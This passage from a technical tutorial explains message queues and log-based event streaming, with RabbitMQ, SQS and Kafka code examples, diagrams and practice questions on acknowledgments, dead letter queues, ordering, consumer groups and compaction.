ch.basic_nack(delivery_tag=method.delivery_tag, requeue=False) # -> DLQ
channel.basic_qos(prefetch_count=10) # never hold more than 10 unacked jobs:
# this is backpressure at the consumer
channel.basic_consume(queue="transcode", on_message_callback=on_message)
The costs are real and should be stated plainly. You have added a component to operate, the result is no longer available when the request returns (so the client needs polling, a callback, or a push channel), failures happen out of band where no user sees them, and debugging now means correlating logs across a boundary. Use a queue when the work is genuinely deferrable; a synchronous call is simpler and simplicity has value.
Key Takeaways
- A broker decouples producer and consumer in time, capacity, location, and failure — that decoupling is the entire point.
- The producer's job is to record intent durably and return immediately, typically with
202 Acceptedand a job ID.- Consumers acknowledge only after the work succeeds, so a crash mid-work redelivers rather than loses.
- The costs are an extra component, deferred results, and out-of-band failures; do not queue work that the caller genuinely needs answered now.
🧪 Practice
- List three operations in a typical e-commerce checkout that should stay synchronous and three that should be queued. Justify each.
- The consumer above crashes after transcoding but before
basic_ack. Trace exactly what happens and what the user observes.- Interview: A queue lets an API return in 20 ms instead of 4 minutes. What did the user actually gain, and what problem did you create for them? (Hint: the work still takes 4 minutes — who is now responsible for telling them it finished?)
Point-to-Point vs. Publish-Subscribe
Once messages flow through a broker, the next question is how many consumers should receive each one. There are exactly two answers, and they correspond to two different intentions.
Point-to-point (a queue): each message is delivered to exactly one consumer. The message represents a task that must be performed once — charge this card, resize this image, send this email. Adding consumers adds throughput, not duplication.
Publish-subscribe (a topic): each message is delivered to every subscriber. The message represents a fact that has occurred — an order was placed, a user signed up — and any number of independent parties may care about it. Adding a subscriber adds a new reaction to the same fact.
The distinction shows up in the language you use to name things. Queues carry
commands (imperative: SendWelcomeEmail), topics carry events (past
tense: UserRegistered). If you find yourself publishing SendEmail to a topic
where three services subscribe, you have three services each sending an email.
POINT-TO-POINT (queue) PUBLISH-SUBSCRIBE (topic)
producer publisher
| |
v v
[ queue: m1 m2 m3 ] [ topic: OrderPlaced ]
| | | / | \
v v v v v v
worker1 worker2 worker3 [ email q ] [ ship q ] [ analytics q ]
| | |
m1 -> worker1 ONLY v v v
m2 -> worker2 ONLY consumer consumer consumer
Each message handled once. EVERY subscriber gets a COPY of m1.
Scale = add workers. Add a subscriber = add a reaction.
The architecturally important consequence is who knows about whom. With point-to-point, the producer chooses the queue, and therefore chooses the handler — the coupling is reduced but not removed. With publish-subscribe, the publisher names only the fact; subscribers appear and disappear without the publisher's code changing. That is what makes pub/sub the substrate for event-driven architecture: new features become new subscribers.
# Point-to-point: the producer names the task and its handler queue.
sqs.send_message(QueueUrl=CHARGE_QUEUE, MessageBody=json.dumps({
"command": "ChargeCard", "order_id": "o-991", "amount_cents": 4999,
}))
# Exactly one worker charges the card. Two would be a duplicate charge.
# Publish-subscribe: the publisher names the FACT and knows no subscribers.
sns.publish(TopicArn=ORDER_EVENTS, Message=json.dumps({
"event": "OrderPlaced", # past tense: it already happened
"order_id": "o-991",
"user_id": "u-42",
"total_cents": 4999,
"occurred_at": "2026-08-25T10:14:02Z",
}))
# Email, shipping, analytics, and fraud each receive their own copy.
# Adding a loyalty-points service tomorrow requires NO change here.
The near-universal production pattern combines both: a topic fans out to one queue per subscriber. This matters more than it first appears. If subscribers read the topic directly, a slow or broken subscriber affects the others; with a queue per subscriber, each has its own buffer, its own backlog, its own retry behaviour, and its own dead-letter queue. One subscriber failing becomes one growing queue, not a shared incident.
| Property | Point-to-point | Publish-subscribe |
|---|---|---|
| Deliveries per message | One consumer | Every subscriber |
| Message names a | Command (imperative) | Event (past tense) |
| Adding consumers | More throughput | More reactions |
| Producer knows the handler | Yes (chooses the queue) | No |
| Typical use | Task execution | State-change notification |
| Failure isolation | Natural (one queue) | Needs a queue per subscriber |
Key Takeaways
- Queues deliver each message once and scale throughput; topics deliver to every subscriber and scale reactions.
- Name the difference in your payloads: commands are imperative, events are past tense.
- Pub/sub removes the publisher's knowledge of consumers, which is what makes event-driven extension possible.
- Fan a topic out into one queue per subscriber so a broken subscriber is isolated behind its own backlog.
🧪 Practice
- Classify these as command or event and pick the pattern:
PaymentCaptured,SendPasswordReset,InventoryReserved,GenerateMonthlyReport.- Draw the topology for an order system where email, warehouse, and analytics all react to an order, and the warehouse consumer is frequently slow.
- Interview: A team publishes
SendConfirmationEmailto a topic and users report duplicate emails. Diagnose it. (Hint: how many subscribers does a topic deliver to, and what does the message name imply about how many times the action should occur?)
Queue Durability and Acknowledgments
A queue's value depends entirely on whether it can be trusted not to lose work. Two mechanisms provide that trust, and they protect against different failures: durability protects against the broker dying, acknowledgments protect against the consumer dying.
Durability means the message is written to stable storage before the broker confirms receipt to the producer. Without it, a message lives only in the broker's memory and vanishes on restart. There are three layers, and all three must be configured — getting two right and one wrong loses messages.
- Durable queue: the queue definition survives a restart. Without this the queue itself disappears, taking everything in it.
- Persistent message: this specific message is written to disk, not only held in memory.
- Publisher confirms: the broker tells the producer "I have it, durably."
Without confirms the producer cannot know whether a message it sent survived,
and
send()returning is not evidence of anything.
THE WINDOW WHERE A MESSAGE CAN VANISH
producer broker consumer
| | |
|--- publish ------>| |
| | (in memory only) |
|<-- (no confirm) --| X broker crashes HERE |
| | -> message gone, and the producer
| | believes it was sent
With persistence + publisher confirms:
|--- publish ------>|
| |-- fsync to disk --> [ log ]
|<-- ack (confirm) -|
| | X crash -> message recovered on restart
Cost: an fsync per message (or per batch). Throughput drops; durability
is bought with latency, and the exchange rate is set by batching.
Acknowledgments cover the other half. When a consumer receives a message, the broker does not delete it — it marks it in flight and starts a timer. The consumer acknowledges only after the work is complete. If the consumer crashes, the timer expires and the message returns to the queue for someone else.
The critical rule follows directly: acknowledge after the work, never before. Auto-acknowledge mode — where receiving is treated as completing — turns every consumer crash into silent data loss.
# WRONG: auto-ack. The broker deletes the message on delivery.
channel.basic_consume(queue="jobs", on_message_callback=handle, auto_ack=True)
# A crash inside handle() loses the job permanently, with no error anywhere.
# RIGHT: manual ack after successful completion.
def handle(ch, method, properties, body):
job = json.loads(body)
try:
process(job) # do the work FIRST
ch.basic_ack(delivery_tag=method.delivery_tag) # then confirm
except Exception:
# requeue=False sends it to the dead-letter exchange instead of
# spinning on the same failure forever.
ch.basic_nack(delivery_tag=method.delivery_tag, requeue=False)
channel.basic_consume(queue="jobs", on_message_callback=handle, auto_ack=False)
The in-flight timer — SQS calls it the visibility timeout, RabbitMQ the consumer timeout — is the parameter people get wrong most often. Set it shorter than the job's real duration and the message is redelivered while the first consumer is still working on it, producing duplicate processing. Set it far too long and a crashed consumer's job sits invisible for that entire period.
# For jobs with variable duration, extend the lease instead of guessing high.
def process_with_heartbeat(receipt_handle, job):
for progress in do_work_incrementally(job):
sqs.change_message_visibility(
QueueUrl=QUEUE, ReceiptHandle=receipt_handle,
VisibilityTimeout=60, # push the deadline out another 60s while
) # we are demonstrably still alive
sqs.delete_message(QueueUrl=QUEUE, ReceiptHandle=receipt_handle) # the ack
Note what this combination guarantees and what it does not. Persistence plus manual acknowledgment gives at-least-once delivery: nothing is lost, but a crash between finishing the work and sending the ack means the work runs again. That duplicate is not a bug you can configure away — it is the price of not losing messages, and Section 7.3 covers how consumers are made to tolerate it.
Key Takeaways
- Durability needs all three of: a durable queue, persistent messages, and publisher confirms — any one missing reopens a loss window.
- Acknowledge after the work completes; auto-ack converts consumer crashes into silent loss.
- The in-flight/visibility timeout must exceed the real job duration, or messages are redelivered while still being processed.
- Persistence plus manual ack yields at-least-once delivery, so duplicates are guaranteed to happen eventually.
🧪 Practice
- A job takes 30-300 seconds and the visibility timeout is 60 seconds. Describe the failure and give two fixes.
- Which of the three durability layers is missing if the producer's
send()succeeds but the message is absent after a broker restart?- Interview: What throughput cost does persistence impose, and how do brokers reduce it without abandoning durability? (Hint: the expensive operation is the disk flush — must it happen once per message?)
Dead Letter Queues
Some messages can never succeed. The payload is malformed, it references a record that was deleted, it triggers a bug, or it asks for something the system no longer supports. Without a plan for these, a single such message becomes an infinite loop: receive, fail, requeue, receive, fail — consuming capacity forever and, in a strictly ordered queue, blocking everything behind it.
A dead letter queue (DLQ) is where such messages go after a bounded number of failed attempts. It converts an unbounded retry loop into a finite one plus a durable record of what could not be processed.
The name for the failure it prevents is a poison message: one message whose processing always fails, occupying a consumer indefinitely. In a system with ordering guarantees, one poison message can halt an entire partition.
WITHOUT A DLQ WITH A DLQ (maxReceiveCount = 5)
[ queue: BAD m2 m3 ] [ queue: BAD m2 m3 ]
| |
v receive v receive (attempt 1..5)
consumer -> FAILS consumer -> FAILS
| |
+---- requeue ----+ +---- requeue ----+ (x4)
| | | |
<-----------------+ <-----------------+
|
Loops forever. m2 and m3 wait v after attempt 5
behind it in an ordered queue. [ DLQ: BAD ] -> alert, inspect, fix
One bad byte stops the system.
m2 and m3 proceed normally.
# SQS: the redrive policy is the entire configuration.
JobQueue:
Type: AWS::SQS::Queue
Properties:
VisibilityTimeout: 300
RedrivePolicy:
deadLetterTargetArn: !GetAtt JobDLQ.Arn
maxReceiveCount: 5 # 5 receives, then it is moved to the DLQ
JobDLQ:
Type: AWS::SQS::Queue
Properties:
MessageRetentionPeriod: 1209600 # 14 days: long enough to notice, triage,
# fix the bug, and redrive
A DLQ is only useful if three things follow from a message arriving in it.
It must be alarmed. A DLQ nobody watches is a folder where work goes to be
forgotten. DLQ depth > 0 is one of the few alert conditions that is almost
always meaningful, because it means work was accepted and definitively not done.
It must carry context. The message alone rarely explains the failure. Attach the error, the attempt count, the consumer version, and the trace ID.
# Explicit dead-lettering with diagnostic context attached.
def consume(msg):
attempts = int(msg.attributes.get("ApproximateReceiveCount", 1))
try:
process(msg.body)
msg.delete()
except PermanentError as e:
# Do not waste four more attempts on something that cannot succeed.
send_to_dlq(msg, reason=str(e), attempts=attempts, terminal=True)
msg.delete()
except TransientError as e:
if attempts >= MAX_ATTEMPTS:
send_to_dlq(msg, reason=str(e), attempts=attempts, terminal=False)
msg.delete()
else:
raise # let the visibility timeout redeliver it
def send_to_dlq(msg, reason, attempts, terminal):
sqs.send_message(QueueUrl=DLQ_URL, MessageBody=msg.body,
MessageAttributes={
"error": {"DataType": "String", "StringValue": reason[:256]},
"attempts": {"DataType": "Number", "StringValue": str(attempts)},
"terminal": {"DataType": "String", "StringValue": str(terminal)},
"consumer_ver": {"DataType": "String", "StringValue": VERSION},
"trace_id": {"DataType": "String", "StringValue": current_trace()},
})
It must be redrivable. Most DLQ messages are not poison at all — they are ordinary messages that failed during an outage of something downstream. Once the dependency recovers, they should be moved back to the main queue. Redrive slowly: dumping fifty thousand messages back at once re-creates the overload that caused them.
The distinction is worth internalizing, because it changes what you do next. Transient failures (a timeout, a 503) deserve retries and later redrive. Permanent failures (schema violation, deleted entity) deserve immediate dead-lettering — retrying them four more times only delays the inevitable while burning capacity.
Key Takeaways
- A DLQ bounds retries and captures messages that cannot succeed, preventing infinite loops and head-of-line blocking.
- Alert on DLQ depth: it represents accepted work that was definitively not done.
- Attach the error, attempt count, consumer version, and trace ID, or triage becomes guesswork.
- Dead-letter permanent errors immediately; retry transient ones and redrive them gradually after recovery.
🧪 Practice
- With
maxReceiveCount: 5and a 300-second visibility timeout, how long before a permanently failing message reaches the DLQ?- Write the classification logic that decides between immediate dead-lettering and retry for: a 404, a 429, a JSON parse error, a 503.
- Interview: Your DLQ has 50,000 messages from a three-hour database outage. How do you get them processed? (Hint: what happens to the database if all 50,000 arrive in the next thirty seconds?)
Message Ordering Guarantees
Ordering is the guarantee that message B, sent after message A, is processed after A. It sounds elementary and is surprisingly expensive, because ordering and parallelism are in direct opposition: the only way to guarantee two messages are processed in order is to refuse to process them at the same time.
That tension explains every design in this area. A single queue with a single consumer is perfectly ordered and cannot scale. Add a second consumer and both pull messages concurrently; message 2 may finish before message 1 even if it was delivered second. Ordering was not lost by the broker — it was lost by the concurrency you added on purpose.
ORDER LOST BY CONCURRENCY, NOT BY THE BROKER
queue: [ m1 m2 m3 m4 ] delivered in order, processed in parallel
worker A <- m1 ......... 900 ms (slow: cold cache) ......> done
worker B <- m2 ... 40 ms ...> done <- FINISHES FIRST
worker A <- m3 ... 50 ms ...> done
Completion order: m2, m3, m1. If these are "set name = Alice",
"set name = Bob", "set name = Carol", the final value is Alice.
The resolution used by every real system is that global ordering is almost never required — per-entity ordering is. Nobody needs order 991's events ordered relative to order 992's. They need order 991's own events in order. That insight converts an unscalable requirement into a scalable one: partition by entity, guarantee order within a partition, and process partitions in parallel.
PARTITIONED ORDERING: order per key, parallelism across keys
hash(order_id) % 4
partition 0: [ o-100:created o-100:paid o-100:shipped ] -> consumer 1
partition 1: [ o-101:created o-101:paid ] -> consumer 2
partition 2: [ o-102:created ] -> consumer 3
partition 3: [ o-103:created o-103:cancelled ] -> consumer 4
Strict order WITHIN each key. No order guarantee ACROSS keys -- and none
is needed. Parallelism = number of partitions.
# Kafka: the partition key is the ordering unit.
producer.send(
topic="order-events",
key=order_id.encode(), # SAME key -> SAME partition -> strict order
value=json.dumps(event).encode(),
)
# Choosing this key is the single most consequential decision in the design.
# Too coarse (key="orders") -> one partition, no parallelism.
# Too fine (key=event_id) -> perfect parallelism, no ordering at all.
# SQS FIFO: the same idea under a different name.
sqs.send_message(
QueueUrl=FIFO_QUEUE_URL,
MessageBody=json.dumps(event),
MessageGroupId=order_id, # ordering scope; groups run in parallel
MessageDeduplicationId=event_id, # 5-minute dedup window
)
# One stuck message blocks its GROUP only -- which is exactly the trade:
# finer groups mean more parallelism and a smaller blast radius when stuck.
| Guarantee level | Parallelism | Cost |
|---|---|---|
| No ordering | Unlimited | Consumers must be order-independent |
| Per-key / per-partition | One per partition | Hot keys become hot partitions |
| Global (total) order | One consumer | No horizontal scaling; a single point |
Two practical warnings. First, a retry breaks ordering even inside a partition: if m1 fails and is retried while m2 succeeds, m2 landed first. Ordered processing therefore requires stopping the partition on failure, not skipping ahead — which is why one poison message can stall a Kafka partition entirely. Second, ordering guarantees are per partition, not per topic, so "Kafka guarantees ordering" is only true with the key that makes it true.
The alternative worth considering before paying for ordering at all: make consumers commutative or version-aware, so order stops mattering. Attaching a version or timestamp to each event and ignoring anything older than what you have already applied gives you correct final state under any delivery order — often far cheaper than serializing the pipeline.
Key Takeaways
- Ordering and parallelism are opposed; strict global order means exactly one consumer.
- Real systems need per-entity ordering, delivered by partitioning on an entity key.
- The partition key choice sets both the ordering scope and the maximum parallelism — too coarse kills throughput, too fine kills ordering.
- Retries reorder within a partition, so ordered consumers must halt on failure rather than skip; version-aware consumers avoid the problem entirely.
🧪 Practice
- Pick partition keys for: bank transactions, chat messages, IoT sensor readings, page views. Justify the parallelism each allows.
- Explain why a poison message stalls a Kafka partition but not a standard SQS queue, and what that implies for DLQ design.
- Interview: You need ordered processing but one key produces 60% of traffic. What do you do? (Hint: either the key must be split, or the ordering requirement for that key must be re-examined.)
Competing Consumers Pattern
The competing consumers pattern is the standard way to scale queue processing: attach many consumer instances to one queue and let them compete for messages. The broker hands each message to exactly one of them, so throughput scales with consumer count without any coordination between consumers.
What makes it work is that the broker is already the coordinator. Each consumer simply asks for work; the broker's in-flight tracking guarantees that no two consumers get the same message at the same time. No leader election, no partition assignment, no shared state — which is why this is usually the first scaling pattern reached for and rarely the wrong one.
It also gives self-balancing load distribution for free. Consumers pull only when ready, so a slow consumer naturally takes fewer messages while a fast one takes more. Compare that with a push-based system, which must estimate consumer capacity and will overload the slow one.
COMPETING CONSUMERS
[ queue: m1 m2 m3 m4 m5 m6 m7 ]
/ | \
v v v
consumer1 consumer2 consumer3
(fast) (slow) (fast)
m1 m2 m3
m4 m5
m6 m7
Fast consumers pull more. No coordination needed: PULL is the balancer.
Add consumer4 -> it starts pulling immediately, no rebalance, no config.
# Scaling knob 1: prefetch. This single number controls fairness.
channel.basic_qos(prefetch_count=1)
# prefetch=1 -> a consumer holds one unacked message. Perfect fairness,
# highest per-message overhead. Right for long, variable jobs.
# prefetch=100 -> a consumer grabs 100 up front. High throughput, but a slow
# consumer HOARDS 100 messages while others idle, and its crash
# delays 100 messages by a full visibility timeout.
#
# Rule of thumb: long jobs (seconds+) -> low prefetch;
# short jobs (millis) -> high prefetch to amortize round trips.
# Scaling knob 2: how many consumers. Drive it from queue depth, not CPU.
def desired_consumers(queue_depth, arrival_rate, msgs_per_sec_per_consumer,
target_drain_seconds=300):
# Enough capacity to keep up with arrivals...
steady = arrival_rate / msgs_per_sec_per_consumer
# ...plus enough to clear the existing backlog within the target window.
catch_up = queue_depth / (msgs_per_sec_per_consumer * target_drain_seconds)
return max(1, math.ceil(steady + catch_up))
print(desired_consumers(queue_depth=45_000, arrival_rate=120,
msgs_per_sec_per_consumer=8))
#: 34 consumers -> 15 to keep up, 19 to drain the backlog in 5 minutes.
#
# Queue depth is the correct auto-scaling signal for workers: it is the only
# metric that reflects both arrival rate AND service rate. CPU does not.
Three consequences of the pattern deserve attention.
Consumers must be idempotent. Competing consumers combined with at-least-once delivery means a message will occasionally be processed twice — after a timeout expires while the first consumer is still alive, for example. This is not an edge case; it is routine at scale.
Ordering is gone. As the previous topic showed, this is inherent. If you need order, you need partitioned consumers, which is a different pattern with different scaling properties.
The bottleneck moves. Twenty consumers hitting one database do not process work twenty times faster; they produce twenty times the database load. The queue's depth tells you whether you need more consumers; the downstream's saturation tells you whether more consumers will help.
| Aspect | Competing consumers (queue) | Partitioned consumers (log) |
|---|---|---|
| Work assignment | Broker, per message | Static partition assignment |
| Adding a consumer | Instant, no rebalance | Triggers a rebalance |
| Max parallelism | Unbounded | Number of partitions |
| Ordering | None | Per partition |
| Slow consumer | Takes less work naturally | Its partition falls behind |
Key Takeaways
- Many consumers on one queue scale throughput with zero coordination — the broker's in-flight tracking is the coordination.
- Pull-based delivery self-balances: fast consumers take more work, slow ones less.
- Prefetch trades fairness against throughput; use low prefetch for long jobs and high prefetch for short ones.
- Scale consumers on queue depth, and check that the downstream can absorb the added concurrency before adding it.
🧪 Practice
- Compute the consumers needed for a 200,000-message backlog, 500 msg/s arrival, 12 msg/s per consumer, drained within ten minutes.
- Explain the exact harm of
prefetch_count=500for jobs averaging 45 seconds each.- Interview: You triple your consumers and throughput improves by 10%. What happened? (Hint: the queue was not the constraint — what did all three times as many consumers start doing simultaneously?)
<a id="72-event-streaming"></a>
7.2 Event Streaming
A queue delivers a message and forgets it. A stream keeps every message in an ordered, replayable log. That single change — retention instead of deletion — produces a different set of capabilities and a different set of problems.
Log-Based Streaming Architecture
Traditional brokers treat a message as a task in transit: it arrives, it is delivered, it is deleted. Log-based streaming systems treat a message as a fact appended to a permanent record. Consumers read from a position in that record and advance their own pointer; nothing is removed because someone read it.
The reason this matters is that deletion destroys information you frequently need later. With a queue, once the analytics consumer has processed an event, it is gone — so a bug in the analytics code means the data is unrecoverable, a new service cannot learn what happened before it existed, and rebuilding a corrupted database means asking every producer to resend history nobody kept.
The analogy is the difference between a mailbox and a ledger. Mail is removed when read; each letter has one reader and one life. A ledger is appended to and never erased; any number of readers can start at any page, read at their own pace, and re-read last year's entries whenever they need to.
QUEUE (destructive read) LOG (positional read)
[ m1 m2 m3 ] offset: 0 1 2 3 4 5
| [e0] [e1] [e2] [e3] [e4] [e5]
v consumer reads m1 ^ ^
[ m2 m3 ] m1 is GONE | |
analytics(2) billing(4)
One consumer, one chance.
Bug in the consumer = data lost. Independent positions. Analytics can be
reset to 0 and replay everything without
affecting billing at all.
Three structural properties follow from "append-only, never delete":
Sequential I/O. Writes only ever append to the end of a file, and reads walk forward through it. Sequential disk access is orders of magnitude faster than random access, which is why a log broker on spinning disks can outrun an in-memory broker doing random deletes. There is no per-message index to update, no tombstone to write, no compaction of a mutable structure on the write path.
Zero-copy delivery. Because the on-disk format and the wire format are the same bytes, the broker can hand a range of the file directly to the network card without ever copying it into application memory.
Consumer independence. The consumer's position is the only per-consumer state, and it is just a number. Ten consumers reading the same data cost the broker almost nothing extra, because there is only one copy of the data and ten integers.
# The mental model of the log, in about fifteen lines.
class Log:
def __init__(self):
self.records = [] # append-only; nothing is ever removed
self.positions = {} # consumer_group -> next offset to read
def append(self, record):
self.records.append(record)
return len(self.records) - 1 # the offset IS the identity
def read(self, group, max_records=10):
start = self.positions.get(group, 0)
batch = self.records[start:start + max_records]
return start, batch # NOTE: reading does not advance
def commit(self, group, offset):
# The consumer decides when it has durably handled up to `offset`.
# This separation is what makes replay possible: commit is a choice,
# not a side effect of reading.
self.positions[group] = offset
def reset(self, group, offset=0):
self.positions[group] = offset # replay: just move the pointer back
The architectural consequence is larger than a performance improvement. Because the log retains history, it can serve as the system of record for state changes rather than a transport for notifications. A database becomes a materialized view of the log, derivable at any time by replaying it. That is the foundation of event sourcing, change data capture, and stream processing, all of which depend on the log being the durable truth rather than a pipe.
| Property | Queue broker | Log-based stream |
|---|---|---|
| Read effect | Removes the message | Advances a position |
| Retention | Until consumed | Time or size based |
| Replay | Impossible | Move the offset |
| Adding a new consumer | Sees only new messages | Can start from the beginning |
| Per-consumer cost | A copy of the message | One integer |
| Access pattern | Random (delete anywhere) | Sequential append and scan |
Key Takeaways
- A log retains messages after they are read; consumers track a position rather than consuming destructively.
- Append-only sequential I/O and zero-copy transfer are what make log brokers extremely fast on ordinary disks.
- Multiple consumers are nearly free because per-consumer state is a single offset.
- Retention turns the log into a system of record — replayable, and able to serve consumers that did not exist when the events were written.
🧪 Practice
- Name three capabilities a log has that a queue cannot provide, and one thing a queue does better.
- Extend the
Logclass with time-based retention and explain what breaks for a consumer that falls behind.- Interview: Why can a log broker be faster than an in-memory queue broker? (Hint: compare the disk access pattern, not the storage medium.)
Topics, Partitions, and Offsets
Three concepts define how a log is organized, and together they explain both its scalability and its constraints.
A topic is a named stream of related records — order-events,
page-views. It is a logical grouping, not a physical one.
A partition is the physical unit: an independent, ordered, append-only log file. A topic is split into partitions, and this split is the source of all parallelism in the system. Each partition lives on a broker (with replicas elsewhere), is written to independently, and is consumed by at most one member of a consumer group.
An offset is a record's position within its partition — a monotonically increasing integer that never changes and is never reused. Offsets are meaningful only within a partition; offset 500 in partition 0 has no relationship to offset 500 in partition 1.
TOPIC "order-events" WITH 3 PARTITIONS
partition 0: [0][1][2][3][4][5] <- append here
partition 1: [0][1][2] <- append here
partition 2: [0][1][2][3][4] <- append here
^ ^
| consumer-group-B committed offset 3
consumer-group-A committed offset 0
* Order is guaranteed WITHIN a partition, never across partitions.
* Offsets are per-partition; (partition, offset) is the unique address.
* Parallelism within a consumer group is capped at 3 -- the partition count.
The producer decides the partition, and how it decides is the most consequential choice in the design:
# 1. Keyed: hash(key) % partitions -> same key ALWAYS lands in the same
# partition, which is what gives per-entity ordering.
producer.send("order-events", key=b"order-991", value=payload)
# 2. Keyless: round-robin / sticky batching across partitions.
# Maximum spread, zero ordering guarantee.
producer.send("order-events", value=payload)
# 3. Explicit: you choose. Useful for co-partitioning two topics so a stream
# join can be done locally without a network shuffle.
producer.send("order-events", partition=2, value=payload)
Partition count is a capacity decision that is painful to change later, because
increasing it re-maps keys: hash(k) % 6 is a different partition than
hash(k) % 3, so existing keys move and their historical ordering is broken
across the boundary. The practical guidance is to over-provision modestly at
creation time.
# Sizing partitions: take the maximum of the throughput and parallelism needs.
def partition_count(target_mb_s, per_partition_mb_s,
peak_consumer_instances, growth=2.0):
by_throughput = target_mb_s / per_partition_mb_s
by_parallelism = peak_consumer_instances # a consumer group cannot exceed
# one consumer per partition
return math.ceil(max(by_throughput, by_parallelism) * growth)
print(partition_count(target_mb_s=180, per_partition_mb_s=10,
peak_consumer_instances=24))
# 48 -> 18 needed for throughput, 24 for parallelism, doubled for growth.
#
# Do not simply pick a huge number: every partition costs open file handles,
# memory for buffers, replication traffic, and leader-election time on failure.
Offsets carry one subtlety that causes real bugs. The committed offset is the position a consumer group has durably recorded as processed, and it is normally stored as "the next offset to read", not "the last offset handled". Committing before processing means a crash skips records (at-most-once); committing after processing means a crash reprocesses them (at-least-once). There is no third option that a commit alone can give you.
| Term | Meaning |
|---|---|
| Log end offset | The next offset to be written by a producer |
| Committed offset | Where a consumer group will resume |
| Consumer lag | Log end offset minus committed offset |
| Retention bound | The earliest offset still available to read |
Consumer lag is the single most important metric in any streaming system. It is the exact analogue of queue depth: it measures whether consumers are keeping up, in units of records not yet processed. Alert on lag trending upward, not merely on an absolute value, because a steadily rising lag predicts an outage long before the number itself looks alarming.
Key Takeaways
- A topic is logical; a partition is the physical, ordered log and the unit of parallelism and ordering.
- Offsets are per-partition immutable positions;
(partition, offset)uniquely addresses a record.- Partition count caps consumer-group parallelism and is disruptive to change, because it remaps keys — size it with headroom.
- Consumer lag is the streaming equivalent of queue depth and is the primary health signal.
🧪 Practice
- A topic needs 250 MB/s, each partition sustains 12 MB/s, and peak consumers are 30. How many partitions, and which constraint dominates?
- Explain precisely what breaks for keyed ordering when partitions go from 4 to 8, and describe a migration that avoids it.
- Interview: A consumer group has 12 consumers and the topic has 8 partitions. What is throughput, and what are the other consumers doing? (Hint: what is the maximum number of consumers per partition within one group?)
Consumer Groups and Rebalancing
A consumer group is a set of consumer instances that cooperate to read a topic. The group's defining rule is that each partition is assigned to exactly one member, so every record is processed once by the group as a whole while work is spread across its members.
This gives you both delivery models from one mechanism. Multiple instances in the same group is competing consumers — the work is divided. Multiple groups reading the same topic is publish-subscribe — each group gets every record, independently, with its own offsets. A single topic can feed a billing group, an analytics group, and a search-indexing group, none aware of the others.
ONE TOPIC, TWO GROUPS
topic (4 partitions) group "billing" (2) group "analytics" (4)
p0 ------------------> consumer-A ----------> consumer-W
p1 ------------------> consumer-A ----------> consumer-X
p2 ------------------> consumer-B ----------> consumer-Y
p3 ------------------> consumer-B ----------> consumer-Z
Within a group: work is DIVIDED (each partition to one member).
Across groups: work is DUPLICATED (each group sees everything).
Groups keep separate offsets, so analytics can replay without touching
billing's position.
Rebalancing is the process of reassigning partitions when group membership changes — an instance joins, leaves, crashes, or is deemed dead. It is the mechanism that makes the group self-healing, and it is also the primary source of operational pain in streaming systems.
The pain comes from the classic protocol being stop-the-world: every member revokes its partitions, the group coordinator computes a new assignment, and every member resumes. During that window, no member is processing anything. If rebalances are frequent — a deploy, an autoscaling event, a long GC pause — the group can spend more time rebalancing than working.
STOP-THE-WORLD (eager) vs COOPERATIVE (incremental) REBALANCE
EAGER: all consumers revoke ALL partitions
|<---------- everything stopped ---------->|
reassign -> resume (seconds of zero throughput)
COOPERATIVE: only the partitions that actually MOVE are revoked
p0,p1 keep running --------------------------->
p2 revoked -> reassigned -> resumes
(throughput dips slightly instead of stopping)
# The settings that determine rebalance frequency and duration.
consumer = KafkaConsumer(
"order-events",
group_id="billing",
partition_assignment_strategy=[CooperativeStickyAssignor],
# Cooperative: revoke only what moves. Sticky: keep existing assignments
# where possible, so local state and caches stay warm.
session_timeout_ms=45_000, # how long the coordinator waits for a
# heartbeat before declaring us dead
heartbeat_interval_ms=3_000, # ~1/3 of the session timeout
max_poll_interval_ms=300_000, # MAX TIME BETWEEN poll() CALLS.
# This is the one that bites: if handling
# a batch takes longer than this, the
# coordinator assumes we hung and kicks
# us out -- triggering a rebalance, which
# slows everyone, which causes more
# timeouts. A classic feedback loop.
max_poll_records=100, # bound the batch so processing time stays
# comfortably under max_poll_interval_ms
enable_auto_commit=False, # commit explicitly, after processing
)
Two refinements are worth knowing because they eliminate most unnecessary rebalances.
Static group membership gives each instance a stable group.instance.id.
When a pod restarts during a routine deploy, it rejoins with the same identity
and reclaims its previous partitions without a rebalance, as long as it returns
within the session timeout. This turns a rolling deploy from N rebalances into
zero.
Decoupling polling from processing protects max.poll.interval.ms. Poll on
one thread, hand work to a bounded executor, and pause/resume partitions to
apply backpressure. The consumer keeps heartbeating while the work proceeds.
# Long-running handlers: never block the poll loop.
records = consumer.poll(timeout_ms=1000)
if backlog_full():
consumer.pause(*consumer.assignment()) # stop fetching, KEEP heartbeating
else:
consumer.resume(*consumer.assignment())
submit_to_worker_pool(records) # process off the poll thread
Key Takeaways
- Within a group, partitions are divided among members; across groups, every group receives everything with independent offsets.
- Rebalancing reassigns partitions on membership change and is the main source of stalls in streaming systems.
max.poll.interval.msexceeded by slow processing is the most common cause of a rebalance storm — bound batch size or process off the poll thread.- Cooperative sticky assignment plus static membership removes most rebalances entirely, including those from rolling deploys.
🧪 Practice
- A group of 6 consumers reads an 18-partition topic. Two crash. Describe the assignment before, during, and after the rebalance.
- Handling a batch takes 6 minutes and
max.poll.interval.msis 300,000. Explain the failure loop and give two independent fixes.- Interview: How would you deploy a 20-instance consumer group with no processing gap? (Hint: what does the coordinator need to believe about an instance that is restarting?)
Stream Retention and Compaction
Because a log never deletes on read, something else must decide when records go away. Retention policy is that decision, and there are two fundamentally different kinds.
Time or size based retention deletes whole segments once they exceed an age or the partition exceeds a size. This treats records as a stream of events — things that happened at a time and become irrelevant afterwards. Keep seven days of page views; nobody needs the ones from March.
Log compaction takes a different view: it retains the most recent record per key, forever, deleting only superseded versions. This treats the log as a stream of state changes, where the latest value for each key is the current truth. A compacted topic is a durable, replayable key-value snapshot that also happens to be a change feed.
BEFORE COMPACTION (offsets preserved, keys repeated)
off: 0 1 2 3 4 5 6
key: u1 u2 u1 u3 u2 u1 u4
val: A B A' C B' A'' D
AFTER COMPACTION
off: 3 4 5 6
key: u3 u2 u1 u4
val: C B' A'' D
* The LATEST value for every key survives; earlier versions are removed.
* Offsets are NOT renumbered -- gaps are normal and expected.
* Replaying a compacted topic from 0 reconstructs the full current state.
The practical power of compaction is that it makes the log a valid source for
rebuilding state from scratch. A new service, a wiped cache, or a corrupted
materialized view can be repopulated by replaying the compacted topic from the
beginning: bounded by the number of distinct keys rather than the total history.
Kafka uses this internally for consumer offsets — the __consumer_offsets topic
is compacted, so only the newest offset per group and partition is kept.
# Event stream: keep a week, then discard.
kafka-topics.sh --create --topic page-views \
--config retention.ms=604800000 \
--config cleanup.policy=delete
